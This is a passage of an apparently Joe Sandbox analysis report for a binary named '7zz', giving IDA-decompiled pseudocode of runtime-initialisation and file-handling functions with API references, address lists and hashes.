					 *((intOrPtr*)(_t895 + 0xc)) =  *((intOrPtr*)(_t895 + 0xc)) +  *_t893;
					 *(_t895 - 4) = 2;
					asm("adc [ebp+0x10], ecx");
					_t697 = E004079F2();
					if(_t697 == _t713) {
						_t894 = 0;
						__eflags = 0;
					} else {
						 *(_t697 + 4) = _t713;
						 *(_t697 + 8) = _t713;
						 *_t697 = 0x47b218;
						_t894 = _t697;
					}
					 *(_t895 - 0x1c) = _t894;
					if(_t894 != _t713) {
						 *((intOrPtr*)( *_t894 + 4))(_t894);
					}
					_t34 = _t894 + 8; // 0x8
					 *(_t895 - 4) = 3;
					E0040C9B4(_t34, _t876);
					_t854 =  *(_t895 + 8);
					 *((intOrPtr*)(_t894 + 0x10)) =  *_t854;
					 *((intOrPtr*)(_t894 + 0x14)) =  *((intOrPtr*)(_t854 + 4));
					 *(_t894 + 0x18) = _t713;
					_push(_t895 - 0x1c);
					 *(_t894 + 0x1c) = _t713;
					 *(_t894 + 0x20) = _t713;
					E00424385(_t895 - 0x38);
					_t702 =  *(_t895 - 0x1c);
					 *(_t895 - 4) = 2;
					if(_t702 != _t713) {
						 *((intOrPtr*)( *_t702 + 8))(_t702);
					}
					 *(_t895 - 4) = 1;
					if(_t876 != _t713) {
						 *((intOrPtr*)( *_t876 + 8))(_t876);
					}
					 *(_t895 - 0x10) =  *(_t895 - 0x10) + 1;
					 *(_t895 + 8) =  *(_t895 + 8) + 8;
					if( *(_t895 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0x30))) {
						_t893 =  *(_t895 + 8);
						goto L4;
					}
					_t874 =  *(_t895 - 0x14);
					goto L20;
				}
			}

0x004264fc
0x00426509
0x0042650d
0x00426511
0x0042651b
0x00426bfc
0x00426bfc
0x004270f6
0x004270fc
0x00427104
0x00427104
0x00426524
0x00426529
0x0042652b
0x00426530
0x0042653a
0x0042653d
0x00426540
0x0042654b
0x0042654f
0x00426557
0x0042655c
0x00426649
0x00426655
0x00426658
0x00426663
0x00426667
0x00426674
0x00426678
0x0042667f
0x0042669e
0x004266a1
0x004266a6
0x004266a9
0x004266ae
0x004266b3
0x004266b6
0x004266b6
0x004266bb
0x004266bd
0x004266c2
0x004266c8
0x004266cd
0x004266d1
0x004266dc
0x004266dc
0x004266d3
0x004266d5
0x004266d5
0x004266e1
0x004266e5
0x004266e8
0x004266ed
0x004266f2
0x004266f9
0x004266f9
0x004266f4
0x004266f4
0x004266f4
0x004266fb
0x004266fb
0x0042670c
0x0042670e
0x00426710
0x0042675a
0x0042675d
0x00426760
0x00426843
0x0042684d
0x00426852
0x00426855
0x0042685a
0x0042685d
0x00426860
0x00426863
0x00426866
0x00426869
0x00426fc4
0x00426fdd
0x00426fe2
0x00426fe5
0x00426fed
0x00426fed
0x00426ff0
0x00426ff3
0x00427059
0x0042705e
0x00427071
0x00427075
0x0042707a
0x0042707c
0x0042707f
0x0042709a
0x004270a3
0x004270a6
0x004270c3
0x004270c5
0x004270c9
0x004270d4
0x004270d8
0x004270e0
0x004270e3
0x004270e8
0x004270e8
0x004270e8
0x004270ef
0x004270f4
0x004270f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00427081
0x00427081
0x0042708f
0x00427094
0x00427095
0x00427095
0x00000000
0x00426ff5
0x00426ffb
0x00426fff
0x0042700a
0x0042700e
0x00427016
0x0042701a
0x00427023
0x00427028
0x0042702f
0x00000000
0x0042702f
0x00426ff3
0x0042686f
0x00426872
0x00426878
0x00426884
0x0042688d
0x00426890
0x0042689e
0x004268a2
0x004268a4
0x004268a7
0x004268a9
0x004268db
0x004268db
0x004268dd
0x004268e1
0x004268e6
0x004268e6
0x004268e9
0x004268ec
0x00426931
0x00426931
0x00426934
0x00426942
0x00426946
0x00426948
0x0042694b
0x0042694d
0x00426a1a
0x00426a1a
0x00426a1c
0x00426a20
0x00426a25
0x00426a25
0x00426a28
0x00426a2b
0x00426a37
0x00426a40
0x00426a43
0x00426a4d
0x00426a5b
0x00426a5f
0x00426a64
0x00426a73
0x00426a77
0x00426a85
0x00426a8a
0x00426a8d
0x00426c06
0x00000000
0x00426a93
0x00426a96
0x00426a9c
0x00426aac
0x00426ab1
0x00426ab4
0x00426ab4
0x00426ab4
0x00426ab4
0x00426c09
0x00426c09
0x00426c0c
0x00426c0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00426c15
0x00426c15
0x00426c15
0x00426c18
0x00426c1b
0x00426c1d
0x00426c34
0x00426c34
0x00426c34
0x00426c37
0x00426c37
0x00426c39
0x00426c4c
0x00426c4f
0x00426c52
0x00426c54
0x00426c6f
0x00426c6f
0x00426c6f
0x00426c72
0x00426c72
0x00426c74
0x00426f4d
0x00426f51
0x00426f5c
0x00426f60
0x00426f6b
0x00426f6f
0x00426f7a
0x00426f7e
0x00426f86
0x00426f8a
0x00426f93
0x00426f98
0x00426fa2
0x00426fa9
0x00426fae
0x00426fb5
0x00426fba
0x00000000
0x00426fba
0x00426c7a
0x00000000
0x00426c7a
0x00426c56
0x00426c59
0x00426c5c
0x00426c5e
0x00000000
0x00000000
0x00426c64
0x00426c67
0x00426c6a
0x00426c6d
0x00000000
0x00000000
0x00000000
0x00426c6d
0x00426ce6
0x00000000
0x00426ce6
0x00426c3e
0x00426c42
0x00000000
0x00426c42
0x00426c1f
0x00426c22
0x00426c25
0x00426c27
0x00000000
0x00000000
0x00426c29
0x00426c2c
0x00426c2f
0x00426c32
0x00000000
0x00000000
0x00000000
0x00426c32
0x00426c47
0x00000000
0x00426c7d
0x00426c87
0x00426c8c
0x00426c8f
0x00426c92
0x00426c95
0x00426c95
0x00000000
0x00426c15
0x00426a8d
0x00426953
0x00426956
0x00426958
0x00426e07
0x00426e09
0x00426e0d
0x00426e12
0x00426e12
0x00426e1b
0x00426e1f
0x00426e2a
0x00426e2e
0x00426e36
0x00426e3a
0x00426e43
0x00426e48
0x00426e4f
0x00426e56
0x00426f2e
0x00426f31
0x00426f36
0x00426f3d
0x00000000
0x00426f3d
0x0042695e
0x00426968
0x0042696f
0x00426971
0x00426973
0x00426e63
0x00426e69
0x00426e6c
0x00426e70
0x00426e72
0x00426e77
0x00426e77
0x00426e80
0x00426e84
0x00426e8f
0x00426e93
0x00426e9b
0x00426e9f
0x00426ea8
0x00426ead
0x00426eb4
0x00000000
0x00426eb4
0x00426979
0x0042697c
0x0042697f
0x0042698f
0x00426993
0x00426996
0x004269a1
0x004269a5
0x004269a9
0x004269ae
0x004269b1
0x004269b4
0x004269de
0x004269de
0x004269e8
0x004269eb
0x004269ee
0x004269f0
0x004269f2
0x00426ebd
0x00426ec5
0x00426ecc
0x00426ed6
0x00426edc
0x00426edf
0x00426ee3
0x00426ee5
0x00426eea
0x00426eea
0x00426ef3
0x00426ef7
0x00426f02
0x00426f06
0x00426f0e
0x00426f12
0x00426f1b
0x00426f20
0x00426f27
0x00000000
0x00426f27
0x004269f8
0x00426a00
0x00426a07
0x00426a11
0x00426a17
0x00000000
0x00000000
0x00000000
0x00000000
0x004269b6
0x004269b6
0x004269bf
0x004269c1
0x004269c5
0x004269ca
0x004269d2
0x004269d9
0x004269d9
0x00000000
0x004268ee
0x004268ee
0x004268f1
0x004268ff
0x00426903
0x00426905
0x00426908
0x0042690a
0x00426923
0x00426923
0x00426925
0x00426929
0x0042692e
0x0042692e
0x00000000
0x00426929
0x00426912
0x00426915
0x00426917
0x0042691a
0x00426d99
0x00426d9c
0x00426da0
0x00426da2
0x00426da7
0x00426da7
0x00426db0
0x00426db4
0x00426dbf
0x00426dc3
0x00426dcb
0x00426dcf
0x00426dd8
0x00426ddd
0x00426de7
0x00426dee
0x00426df3
0x00426dfa
0x00426dff
0x00000000
0x00426dff
0x00426920
0x00000000
0x00426920
0x004268ec
0x004268ae
0x004268b1
0x004268b4
0x004268b7
0x00426ceb
0x00426ced
0x00426cf1
0x00426cf6
0x00426cf6
0x00426cff
0x00426d03
0x00426d0e
0x00426d12
0x00426d1a
0x00426d1e
0x00426d27
0x00426d2c
0x00426d33
0x00426b8c
0x00426b8c
0x00000000
0x00426b8c
0x004268ca
0x004268cd
0x004268cf
0x004268d2
0x00426d3f
0x00426d42
0x00426d46
0x00426d48
0x00426d4d
0x00426d4d
0x00426d56
0x00426d5a
0x00426d65
0x00426d69
0x00426d71
0x00426d75
0x00426d7e
0x00426d83
0x00426d8a
0x00426d8d
0x00000000
0x00426d8d
0x004268d8
0x00000000
0x00426c9e
0x00426ca7
0x00426cb3
0x00426cbc
0x00426cc0
0x00426ccb
0x00426ccf
0x00426cd4
0x00426cd5
0x00426cd8
0x00426cd8
0x00000000
0x00000000
0x00000000
0x00000000
0x00426766
0x00426766
0x0042676f
0x00426772
0x00426775
0x00426778
0x0042677c
0x00426782
0x00426786
0x00426788
0x0042678d
0x0042678f
0x00426792
0x00000000
0x00000000
0x00426798
0x0042679b
0x0042679f
0x004267a3
0x004267d1
0x004267d1
0x004267d4
0x00426b96
0x00426b99
0x00426b9d
0x00426b9f
0x00426ba4
0x00426ba4
0x00426bad
0x00426bb1
0x00426bbc
0x00426bc0
0x00426bc8
0x00426bcc
0x00426bd5
0x00426bda
0x00426be4
0x00426beb
0x00426bf0
0x00426bf0
0x00426bf0
0x00426bf7
0x00000000
0x00426bf7
0x004267e0
0x004267e5
0x004267e8
0x004267f0
0x004267f0
0x004267f5
0x004267fb
0x004267fc
0x00426801
0x00426804
0x00426808
0x0042680a
0x0042680f
0x0042680f
0x00426812
0x00426815
0x00426819
0x0042681b
0x00426820
0x00426820
0x00426823
0x00426826
0x0042682a
0x0042682c
0x00426831
0x00426831
0x00426834
0x0042683a
0x0042683d
0x00000000
0x00000000
0x00000000
0x00000000
0x0042683d
0x004267a5
0x004267a9
0x00000000
0x00000000
0x004267ab
0x004267ae
0x004267b0
0x00426b29
0x00426b2c
0x00426b30
0x00426b32
0x00426b37
0x00426b3a
0x00426b3a
0x00426b3d
0x00426b3f
0x00426b43
0x00426b48
0x00426b48
0x00426b51
0x00426b55
0x00426b60
0x00426b64
0x00426b6c
0x00426b70
0x00426b79
0x00426b7e
0x00426b85
0x00000000
0x00426b85
0x004267ba
0x004267bf
0x004267c2
0x004267ca
0x004267ca
0x00000000
0x004267c2
0x00426abe
0x00426ac1
0x00426ac5
0x00426ac7
0x00426acc
0x00426acc
0x00426acf
0x00426ad2
0x00426ad6
0x00426ad8
0x00426add
0x00426add
0x00426ae6
0x00426aea
0x00426af5
0x00426af9
0x00426b01
0x00426b05
0x00426b0e
0x00426b13
0x00426b1a
0x00426b1d
0x00000000
0x00426712
0x00426718
0x0042671c
0x00426727
0x0042672b
0x00426733
0x00426737
0x00426740
0x00426745
0x0042674c
0x00426753
0x00427036
0x00427039
0x0042703e
0x00427045
0x0042704a
0x00000000
0x0042704a
0x00426710
0x0042668a
0x00426691
0x00426693
0x00426695
0x00426698
0x00000000
0x00000000
0x00000000
0x00426562
0x00426562
0x00426565
0x0042656d
0x0042656d
0x0042656f
0x00426577
0x00426586
0x00426586
0x00426579
0x00426579
0x0042657c
0x00426582
0x00426582
0x0042658a
0x0042658d
0x00426592
0x00426592
0x00426598
0x0042659a
0x004265a0
0x004265a6
0x004265ab
0x004265b1
0x004265b5
0x004265b8
0x004265c0
0x004265d2
0x004265d2
0x004265c2
0x004265c2
0x004265c5
0x004265c8
0x004265ce
0x004265ce
0x004265d6
0x004265d9
0x004265de
0x004265de
0x004265e2
0x004265e5
0x004265e9
0x004265ee
0x004265f6
0x004265fc
0x004265ff
0x00426602
0x00426606
0x00426609
0x0042660c
0x00426611
0x00426614
0x0042661a
0x0042661f
0x0042661f
0x00426624
0x00426628
0x0042662d
0x0042662d
0x00426630
0x00426639
0x00426640
0x0042656a
0x00000000
0x0042656a
0x00426646
0x00000000
0x00426646

APIs

__EH_prolog.LIBCMT ref: 004264FC

Part of subcall function 0042CD7D: __EH_prolog.LIBCMT ref: 0042CD82

Part of subcall function 00467C60: InitializeCriticalSection.KERNEL32(?,00000001,?,?,-00000016), ref: 00467C8E

DeleteCriticalSection.KERNEL32(?), ref: 00426737
SysFreeString.OLEAUT32(?), ref: 00426A11
DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B05
DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B70
DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426BCC
DeleteCriticalSection.KERNEL32(?), ref: 00426D1E
DeleteCriticalSection.KERNEL32(?), ref: 00426D75
DeleteCriticalSection.KERNEL32(?), ref: 00426DCF
DeleteCriticalSection.KERNEL32(?), ref: 00426E3A
SysFreeString.OLEAUT32(?), ref: 00426E63
DeleteCriticalSection.KERNEL32(?), ref: 00426E9F
SysFreeString.OLEAUT32(?), ref: 00426ED6
DeleteCriticalSection.KERNEL32(?), ref: 00426F12
DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 00426F8A
DeleteCriticalSection.KERNEL32(?), ref: 0042701A

Strings

c[@, xrefs: 0042697F, 00426A00, 00426EC5
*, xrefs: 00427071

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$Delete$FreeString$H_prolog$Initialize
String ID: *$c[@
API String ID: 3004459923-117524647
Opcode ID: bcf1dbc30945ca63f9fdfa5c062172442a0eb17af4700839d2541935a3d072c6
Instruction ID: 54e86bbab3a080c51c4da8baaff600dccbbf03e7154ae3ec1f80e40b651aacad
Opcode Fuzzy Hash: bcf1dbc30945ca63f9fdfa5c062172442a0eb17af4700839d2541935a3d072c6
Instruction Fuzzy Hash: A1927D70900259EFCF10DFA4D584ADDBBB0BF14308F6584AEE449A7391CB789A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0046FCD7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E0046FCD7() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = L0046BFC5(0x480);
				if(_t89 == 0) {
					E0046D03C(0x1b);
				}
				 *0x496460 = _t89;
				 *0x496560 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x496460; // 0x2200630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x496460; // 0x2200630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x496560);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x496560 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x496460[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x496464;
					while(1) {
						_t69 = L0046BFC5(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x496560 =  *0x496560 + 0x20;
						__eflags =  *0x496560;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x496560 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x496560; // 0x20
					goto L18;
				}
			}

0x0046fcea
0x0046fcef
0x0046fcf3
0x0046fcf8
0x0046fcf9
0x0046fcff
0x0046fd09
0x0046fd09
0x0046fd0f
0x0046fd13
0x0046fd17
0x0046fd1a
0x0046fd1e
0x0046fd22
0x0046fd27
0x0046fd2a
0x0046fd2a
0x0046fd35
0x0046fd3b
0x0046fd40
0x0046fe17
0x0046fe17
0x0046fe17
0x0046fe19
0x0046fe19
0x0046fe1f
0x0046fe22
0x0046fe26
0x0046fe29
0x0046fe78
0x0046fe78
0x0046fe78
0x00000000
0x0046fe78
0x0046fe2b
0x0046fe2d
0x0046fe31
0x0046fe3d
0x0046fe3f
0x0046fe3f
0x0046fe33
0x0046fe35
0x0046fe35
0x0046fe49
0x0046fe4b
0x0046fe4e
0x0046fe67
0x0046fe67
0x0046fe50
0x0046fe51
0x0046fe57
0x0046fe59
0x00000000
0x00000000
0x0046fe5b
0x0046fe60
0x0046fe62
0x0046fe65
0x0046fe6d
0x0046fe70
0x0046fe72
0x0046fe72
0x00000000
0x0046fe70
0x00000000
0x0046fe65
0x0046fe7c
0x0046fe7c
0x0046fe7d
0x0046fe7d
0x0046fe92
0x0046fe92
0x0046fd46
0x0046fd49
0x0046fd4b
0x00000000
0x00000000
0x0046fd51
0x0046fd53
0x0046fd59
0x0046fd61
0x0046fd63
0x0046fd65
0x0046fd65
0x0046fd67
0x0046fd6d
0x0046fdc5
0x0046fdc5
0x0046fdc7
0x0046fdc9
0x00000000
0x00000000
0x00000000
0x00000000
0x0046fdcb
0x0046fdcb
0x0046fdce
0x0046fdd0
0x0046fdd3
0x00000000
0x00000000
0x0046fdd5
0x0046fdd7
0x0046fdd9
0x00000000
0x00000000
0x0046fddb
0x0046fddd
0x0046fdea
0x0046fdf1
0x0046fdf1
0x0046fdfe
0x0046fe06
0x0046fe0a
0x00000000
0x0046fe0a
0x0046fde0
0x0046fde6
0x0046fde8
0x00000000
0x00000000
0x00000000
0x0046fe0d
0x0046fe0d
0x0046fe11
0x0046fe12
0x0046fe13
0x0046fe13
0x00000000
0x0046fd6f
0x0046fd6f
0x0046fd74
0x0046fd79
0x0046fd7e
0x0046fd81
0x00000000
0x00000000
0x0046fd83
0x0046fd83
0x0046fd8a
0x0046fd8c
0x0046fd8c
0x0046fd92
0x0046fd92
0x0046fd94
0x00000000
0x00000000
0x0046fd96
0x0046fd9a
0x0046fd9d
0x0046fda1
0x0046fda7
0x0046fdaa
0x0046fdaa
0x0046fdb2
0x0046fdb5
0x0046fdbb
0x00000000
0x00000000
0x00000000
0x0046fdbd
0x0046fdbf
0x00000000
0x0046fdbf

APIs

GetStartupInfoA.KERNEL32(?), ref: 0046FD35
GetFileType.KERNEL32(00000480), ref: 0046FDE0
GetStdHandle.KERNEL32(-000000F6), ref: 0046FE43
GetFileType.KERNELBASE(00000000), ref: 0046FE51
SetHandleCount.KERNEL32 ref: 0046FE88

Strings

ddI, xrefs: 0046FD6F

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID: ddI
API String ID: 1710529072-3188649337
Opcode ID: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
Instruction ID: c6205cd4f5c3ada4982f3df846bf7a0052440ebcd376ac522a15a622ffbc9688
Opcode Fuzzy Hash: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
Instruction Fuzzy Hash: B95118715002058BC720CF68E9447667BA0EB21768F25467FC5D2CB2E2FB39984ACB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00415420 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00415420(signed int __ecx, intOrPtr __edx) {
				intOrPtr _t314;
				void* _t315;
				signed int _t321;
				signed int _t328;
				signed int _t340;
				signed char _t350;
				intOrPtr _t351;
				signed int _t356;
				signed int _t368;
				signed int _t373;
				signed int _t377;
				signed char _t383;
				signed int _t388;
				signed int _t393;
				signed char _t395;
				signed int _t411;
				intOrPtr _t415;
				signed int _t418;
				signed int _t421;
				signed int _t424;
				intOrPtr _t460;
				signed int _t462;
				signed int _t469;
				signed int _t473;
				signed int _t476;
				intOrPtr _t532;
				void* _t555;
				intOrPtr _t564;
				signed int _t568;
				signed int _t573;
				signed int _t579;
				intOrPtr _t581;
				signed int _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t593;
				void* _t596;

				E0046B890(E0047490E, _t596);
				_t469 = __ecx;
				 *((intOrPtr*)(_t596 - 0x3c)) = __edx;
				 *(_t596 - 0x10) = __ecx;
				if( *(_t596 + 0x18) == 0 && E00408C73(__ecx) != 0) {
					 *(_t596 + 0x18) = 1;
				}
				_t568 =  *(_t596 + 0x1c);
				if(_t568 == 0) {
					_t581 =  *((intOrPtr*)(_t596 + 0x14));
					L7:
					_t314 =  *((intOrPtr*)(_t596 + 0x10));
					_t590 = 0;
					__eflags =  *(_t314 + 8);
					if( *(_t314 + 8) != 0) {
						L53:
						_push(0x2a);
						_t315 = E00411BD0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
						 *(_t596 - 0x78) =  *(_t596 - 0x78) | 0xffffffff;
						 *(_t596 - 4) = 0xd;
						 *(_t596 - 4) = 0xe;
						E004039C0(_t596 - 0x74, _t315);
						 *(_t596 - 4) = 0x10;
						E00407A18( *((intOrPtr*)(_t596 - 0x20)));
						 *(_t596 - 0x38) =  *(_t596 - 0x38) & 0x00000000;
						E0040351A(_t596 - 0xd4);
						_push(_t596 - 0x11);
						 *(_t596 - 4) = 0x11;
						_t321 = E0040B5C9(_t596 - 0xfc);
						__eflags = _t321;
						if(_t321 == 0) {
							L78:
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push( *((intOrPtr*)(_t596 + 0xc)));
							E00406796( *((intOrPtr*)(_t596 + 0x20)));
							L79:
							E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
							_t297 = _t596 - 4;
							 *_t297 =  *(_t596 - 4) | 0xffffffff;
							__eflags =  *_t297;
							E00407A18( *((intOrPtr*)(_t596 - 0x74)));
							E0040B154(_t596 - 0x78);
							L80:
							_t328 = 0;
							L84:
							 *[fs:0x0] =  *((intOrPtr*)(_t596 - 0xc));
							return _t328;
						}
						while(1) {
							__eflags =  *((char*)(_t596 - 0x11));
							if( *((char*)(_t596 - 0x11)) == 0) {
								goto L79;
							}
							__eflags =  *(_t596 + 0x1c);
							if( *(_t596 + 0x1c) == 0) {
								L60:
								_push( *((intOrPtr*)(_t596 + 0x10)));
								 *((char*)(_t596 - 0x40)) =  *(_t596 + 0x18);
								E004092A8(_t596 - 0x34);
								_push(_t596 - 0xd4);
								 *(_t596 - 4) = 0x12;
								E00406796(_t596 - 0x34);
								_push(_t596 - 0x34);
								E004092A8(_t596 - 0x54);
								 *(_t596 - 4) = 0x13;
								_t340 = E00408E8A(_t469, 0, _t596 - 0x54,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
								__eflags = _t340;
								 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
								if(_t340 == 0) {
									 *(_t596 - 4) = 0x16;
									E0040862D();
									 *(_t596 - 4) = 0x12;
									E00408604(_t596 - 0x54);
									__eflags = E00408E8A(_t469, 1, _t596 - 0x34,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
									if(__eflags != 0) {
										_push(_t581 + 0x3c);
										_push(_t596 - 0xfc);
										E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
										_t383 =  *(_t596 - 0xdc) >> 4;
										__eflags = _t383 & 0x00000001;
										if((_t383 & 0x00000001) != 0) {
											 *((char*)(_t596 - 0x40)) = 1;
										}
									}
									_t350 =  *(_t596 - 0xdc) >> 4;
									__eflags = _t350 & 0x00000001;
									if((_t350 & 0x00000001) != 0) {
										_t351 =  *((intOrPtr*)(_t596 + 0x10));
										 *(_t596 - 0x10) =  *(_t596 - 0x10) & 0x00000000;
										__eflags =  *(_t351 + 8);
										if( *(_t351 + 8) == 0) {
											_t377 = E00408B37(_t469, _t596 - 0xd4);
											__eflags = _t377;
											if(_t377 >= 0) {
												 *(_t596 - 0x10) =  *( *((intOrPtr*)(_t469 + 0x1c)) + _t377 * 4);
											}
										}
										__eflags =  *((char*)(_t596 - 0x40));
										if( *((char*)(_t596 - 0x40)) != 0) {
											L73:
											E0040862D();
											_push( *((intOrPtr*)(_t596 + 0x10)));
											E00409500(_t596 - 0x34);
											__eflags =  *(_t596 - 0x10);
											if(__eflags == 0) {
												_push(_t596 - 0xd4);
												 *(_t596 - 0x10) = _t469;
												E00406796(_t596 - 0x34);
											}
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											_push( *(_t596 + 0x1c));
											_push( *((intOrPtr*)(_t596 - 0x40)));
											_push(_t581);
											_push(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0xd4);
											_push( *((intOrPtr*)(_t596 + 8)));
